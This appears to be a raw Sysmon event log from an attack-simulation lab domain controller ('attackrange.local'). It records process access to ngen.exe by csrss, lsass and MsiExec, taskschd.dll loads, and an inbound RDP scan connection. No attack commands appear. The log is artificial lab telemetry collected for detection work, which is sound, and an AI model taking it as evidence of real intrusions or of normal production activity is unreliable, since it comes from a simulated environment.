14:57:24.577{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-AC0C-00000000BB01}4708c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.577{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-AC0C-00000000BB01}4708c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.561{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-AA0C-00000000BB01}7104c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.561{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-AA0C-00000000BB01}7104c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.561{A7A01FEF-EBD4-607E-AA0C-00000000BB01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 354300x800000000000000074393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.209{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57532-false10.0.1.12-8000- 354300x800000000000000074392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.204{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com53748-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000074391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.546{A7A01FEF-EBD4-607E-AB0C-00000000BB01}46004820C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-AA0C-00000000BB01}7104c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.546{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-AB0C-00000000BB01}4600C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.530{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-AA0C-00000000BB01}7104c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.530{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-AA0C-00000000BB01}7104c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.530{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A80C-00000000BB01}1576c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.530{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A80C-00000000BB01}1576c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.530{A7A01FEF-EBD4-607E-A80C-00000000BB01}1576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.499{A7A01FEF-EBD4-607E-A90C-00000000BB01}60082120C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-A80C-00000000BB01}1576c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.499{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A90C-00000000BB01}6008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.499{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A80C-00000000BB01}1576c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.499{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-A80C-00000000BB01}1576c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.483{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A60C-00000000BB01}4360c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.483{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A60C-00000000BB01}4360c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.483{A7A01FEF-EBD4-607E-A60C-00000000BB01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.468{A7A01FEF-EBD4-607E-A70C-00000000BB01}45884784C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-A60C-00000000BB01}4360c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.452{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A70C-00000000BB01}4588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.452{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A60C-00000000BB01}4360c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.452{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-A60C-00000000BB01}4360c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000074373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.452{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=195D9FB903F44261A578AFA97A2D6954,SHA256=F33B3FD4FB44C04ACE49F2C3164E84F5C57E085A66563EFAB59957A25F0354EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.436{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A40C-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.436{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-A40C-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.436{A7A01FEF-EBD4-607E-A40C-00000000BB01}6656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.421{A7A01FEF-EBD4-607E-A50C-00000000BB01}32124828C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-A40C-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.421{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A50C-00000000BB01}3212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.405{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-A40C-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.405{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-A40C-00000000BB01}6656c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 